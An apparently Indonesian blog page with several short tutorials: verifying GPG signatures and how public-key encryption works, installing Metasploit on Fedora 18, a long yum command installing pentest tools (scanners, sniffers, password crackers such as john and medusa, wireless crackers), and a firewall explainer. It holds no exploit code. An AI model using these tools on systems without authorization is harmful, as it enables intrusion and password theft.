   Setelah ditandatangani oleh pengirim, penerima juga harus memverifikasi tandatangan yang dibubuhkan pada file itu. Kini Wawa akan memeriksa apakah yang mengirim file itu benar-benar Kamas.
[wawa@yudowati 20:11 wawa]$ gpg --verify signed.asc
gpg: Signature made Mon Dec 13 19:55:29 2004 WIT using DSA key ID 7D2597DD
gpg: Good signature from "Kamas Muhammad (sokam) <kamas@entahlah.com>" 
 Output Good Signature merupakan tanda bahwa tandatangan yang dibubuhkan benar-benar dari kamas.

Sumber  : Disini
Penulis : sokam.or.id

Apa Itu GPG (GNU Privacy Guard) ?


   GPG (GNU Privacy Guard) adalah suatu software enkripsi yang mengimplementasikan RFC2440. Penggunaan program ini biasanya pada enkripsi email atau sebagai digital signature. Model enkripsi yang digunakan adalah PKI(Public Key Infrastructure). Dengan demikian seseorang pasti mempunyai sepasang kunci yaitu Private Key dan Public Key.
   Private Key adalah kunci enkripsi yang hanya boleh diakses oleh pemilik kunci, sedangkan public key sebisa mungkin harus disebarkan seluas-luasnya. Penyebaran public key ini dapat dilakukan secara manual, yakni dengan cara mendownload dari web seseorang, atau seseorang dapat juga mengirimkan public keynya ke suatu keyserver yang menyimpan public key banyak orang seperti pgp.mit.edu atau www.keyserver.net. Semua orang dapat mencari/mendownload public key milik orang lain untuk digunakan di kemudian hari.
  Private key digunakan untuk mendekrip chiper text yang ditujukan kepada sang pemilik, atau menandatangani suatu dokumen/file yang dikirimkan kepada orang lain. Lalu Bagaimana dengan public key? Key inilah yang digunakan oleh orang lain untuk mengenkrip file teks yang ditujukan kepada sang pemilik key, atau untuk memeriksa/verifikasi keaslian dokumen yang telah ditandatangani oleh pemilik private key.

Contoh Ilustrasi Pemakaian GPG :


 Sebagai contoh, Si A akan mengirim email yang berisi puisi cinta kepada Si B . Sebelum kita dapat mengenkrip puisi cintanya, Si A harus memiliki public key Si B. Si A dapat meminta Si B untuk mengirimkan public keynya melalui email, atau mencari di keyserver bila Si B sudah mensubmitnya. Dengan menggunakan public key itulah maka Si A dapat mengenkripsi puisi cintanya untuk kemudian dikirimkan kepada Si B.
  Si B menerima puisi cinta dari Si A Sendiri dalam bentuk yang terenkripsi. Untuk membacanya Si B perlu mendekrip teks itu. Selain Si B tidak ada orang lain yang dapat mendekrip puisi cinta itu, karena hanya Si B lah yang mempunyai private keynya. Bila private key Si B jatuh ke tangan orang lain, maka orang itu juga dapat mendekrip segala macam email terenkripsi yang ditujukan kepadanya. Maka dari itu Si B harus menyimpan private keynya secara baik dan aman.
  Pada kasus di atas, ada kemungkinan bahwa yang mengirimkan puisi cinta itu bukanlah Si A, namun orang lain yang berpura-pura menjadi Si A. Bukankah email itu dienkrip? Ya, memang. Namun karena enkripsi menggunakan public key sebagai kunci enkripsinya maka siapa pun yang mempunyai public key Si B dapat mengenkrip teks untuk Si B. Oleh karena itu ada baiknya bila Si A juga menandatangani emailnya.
  Untuk membubuhkan digital signature, kita harus menggunakan private key, dan bukan public key. Pada saat menerima email puisi cinta itu, Wawa harus memverifikasi bahwa digital signature yang terdapat di sana benar-benar asli milik Si A dengan menggunakan public key milik Si A. Dengan begitu Si B boleh merasa yakin bahwa puisi itu benar-benar dikirim oleh Si A.
  Enkripsi gpg biasa digunakan dalam pengiriman email. Banyak Mail User Agent (MUA) yang telah mendukung penggunaannya, namun ada juga yang tidak atau belum mengimplementasikan fungsi pgp ini.

Sumber : Disini
Penulis : Sokam.or.id 

Install Metasploit Framework Pada Fedora



   Metasploit Framework adalah sebuah Software Yang berlisensi Freedom yang digunakan untuk menguji celah keamanan dan eksploitasi. biasanya sering digunakan oleh para security analizer untuk keamanan suatu jaringan, untuk melakukan tes penetrasi, untuk mencari vuln suatu sistem dan lain lain. Metasploit Framework di bangun dengan bahasa pemrograman Ruby.Oke lanjut aja ke tahap penginstalannya di bawah ini :

1. Download Metasploit nya disini
2. Pilih Download Metasploit Comunity
3. Isi Folmulir lalu Submith Download


4. Setelah didownload Buka terminal (Ctrl + T) masukan syntax ini :
$ chmod 755 metasploit-latest-linux-installer.run
$ sudo su
$ ./metasploit-latest-linux-installer.run
5. next, next, dan klak, klik aja dan Sudah Siap Digunakan, untuk masalah cara fix error kita bahas lain kali aja :) 

NB : Testing fedora 18

Semoga Sukses !!

Instalasi Pentest Tools Pada Fedora

 


  Pentest Tools adalah sekumpulan tool penetration testing yang komplit biasanya digunakan untuk menguji kehandalan atau pertahanan suatu sistem yang berbasis teknologi informasi. Pada dasarnya tools tools ini adalah sebagai pendukung dalam dunia pentest, selebihnya kembali kepada user bagaimana mencari suatu vuln. jadi jangan pernah berfikir jika sudah menginstall tools ini udah bisa ngehack seperti Onaninus :v eitttts.. keceplosan..  

Berikut ini adalah bagaimana cara menginstallnya :
  
Category Reconnaissance :
$ sudo yum install dsniff hping3 nc6 nc ncrack ngrep nmap nmap-frontend p0f sing scanssh scapy socat tcpdump unicornscan wireshark-gnome xprobe2 nbtscan tcpxtract firewalk hunt dnsenum iftop argus ettercap ettercap-gtk packETH iptraf pcapdiff etherape lynis netsniff-ng tcpjunk ssldump yersinia net-snmp openvas-client openvas-scanner

Category Forensics :

$ sudo yum install ddrescue gparted hexedit testdisk foremost sectool-gui scanmem sleuthkit unhide examiner dc3dd afftools srm firstaidkit-plugin-all ntfs-3g ntfsprogs
Category WebApplicationTesting : 
$ sudo yum install httping nikto ratproxy lbd skipfish
Category Wireless :
$ sudo yum install aircrack-ng airsnort kismet weplab wavemon
Category CodeAnalysis : 
$ sudo yum install splint pscan flawfinder rats
Category IntrusionDetection : 
$ sudo yum install chkrootkit aide labrea honeyd pads nebula rkhunte
Category PasswordTools : 
$ sudo yum install john ophcrack medusa
Category httpd :
$ sudo yum install httpd ruby mod_perl mod_python MySQL-python php php-pear php-mysql
install the Menus : 
$ sudo yum install security-menus

NB : Testing Pada Fedora 18

Apa Itu Firewall ?







  Firewall itu seperti sebuah rumah yang memiliki pagar sebagai pelindungnya.
  Firewall merupakan sebuah sistem atau cara kerja yang diterapkan baik pada hardware maupun software atau di sistem yang lain dengan tujuan untuk melindungi, menfilter, membatasi dan bahkan bisa menolak semua jenis hubungan komunikasi, seperti router, server, LAN, dan lain lain. Pada dasarnya prisip kerja firewal sederhana sebagai berikut :

Konfigurasi sederhana dari firewall : 


  Firewall pada sebuah komputer atau PC,dilakukan dengan menggunakan prinsip “non-routing” pada sebuah Unix host yang menggunakan 2 buah jaringan untuk komunikasi data. Untuk dapat terkoneksi dengan Internet maka harus melewati firewall.

Kegunaan dari Firewall itu sendiri diperuntukan untuk melayani  :
 

  1. Komputer/PC, Setiap orang yang terhubung langsung ke internet pasti menginginkan semua yang terdapat dalam komputernya terlindungi dengan aman agar tidak diakses oleh orang yang tidak terkenal .
  2. Jaringan komputer yang terdiri lebih dari satu buah komputer dan berbagai jenis topologi jaringan yang digunakan.

Karakter Dari Firewall Itu Sendiri 
  1. Hanya komputer atau alamat yang dikenal yang dapat melakukan hubungan.  
  2. Firewall itu sendiri harus bisa memonitoring suatu lalu lintas  komunikasi pada suatu komputer/PC.
  3. Seluruh hubungan harus melewati firewall. dapat dilakukan dengan cara membatasi semua akses terhadap jaringan. 

    Cara Kerja Suatu Firewall :
     

    1. Service control, dari tipe-tipe layanan yang digunakan di Internet yang boleh diakses, Biasanya firewall akan mengecek IP Address dan juga alamat port yang di gunakan pada protokol TCP dan UDP.
       
    2. Direction Control, dari berbagai permintaan terhadap layanan yang dikenali dan langsung diizinkan melewati firewall tersebut.
       
    3. User control, untuk dapat menjalankan suatu layanan, artinya ada user yang bisa mengakses dan ada yang tidak pada suatu service.
       
    4. Behavior Control, seberapa banyak layanan itu telah digunakan, Misal, firewall dapat memfilter email untuk mencegah spam, pengirmina virus dan lain lain.